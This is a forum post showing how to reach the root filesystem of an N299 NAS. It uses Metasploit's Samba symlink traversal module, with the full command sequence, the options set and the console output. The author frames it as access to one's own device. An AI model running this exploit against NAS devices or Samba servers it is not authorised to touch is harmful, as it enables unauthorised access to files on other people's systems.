N299 root filesystem acces

Post Reply
mgadar
Posts: 1
Joined: Thu Oct 04, 2012 1:50 pm

N299 root filesystem acces

Post by mgadar » Sat Oct 06, 2012 9:15 am

NOTE: Because Video folder is scanned by Media Server you must stop it from NAS menu before this exploit.
In order to access root filesystem of N299 we will use linux Back Track.

Launch a terminal window and from the terminal we run

Code: Select all

msfconsole
.
After some loading the prompt will be msf >.
At this prompt we type search samba and we wil have a list with available exploits:

Code: Select all

msf > search samba
The command will list all available exloits.
Load the first one with the command:

Code: Select all

msf > use auxiliary/admin/smb/samba_symlink_traversal
Let's see what are the options:

Code: Select all

sf  auxiliary(samba_symlink_traversal) > show options
Module options (auxiliary/admin/smb/samba_symlink_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOST                       yes       The target address
   RPORT      445              yes       Set the SMB service port
   SMBSHARE                    yes       The name of a writeable share on the server
   SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

Let's set the options:

Code: Select all

msf  auxiliary(samba_symlink_traversal) > set RHOST 192.168.1.2 (change the IP addres with your own NAS IP addres)
msf  auxiliary(samba_symlink_traversal) > set SMBSHARE Video (I set the Video folder from NAS menu to be writtable for everyone)
msf  auxiliary(samba_symlink_traversal) > set RPORT 139
msf  auxiliary(samba_symlink_traversal) > set SMBTARGET roothack (the folder were the root directory will be mount in the Video folder)
Now we run the command exploit:

Code: Select all

msf  auxiliary(samba_symlink_traversal) > exploit

Connecting to the server...
Trying to mount writeable share 'Video'...
Trying to link 'roothack' to the root filesystem...
Now access the following share to browse the root filesystem: \10.1.10.10\Video\roothack\
Auxiliary module execution completed
Now if you go to network folder Video you will see a folder roothack with all the files of root filesistem

Post Reply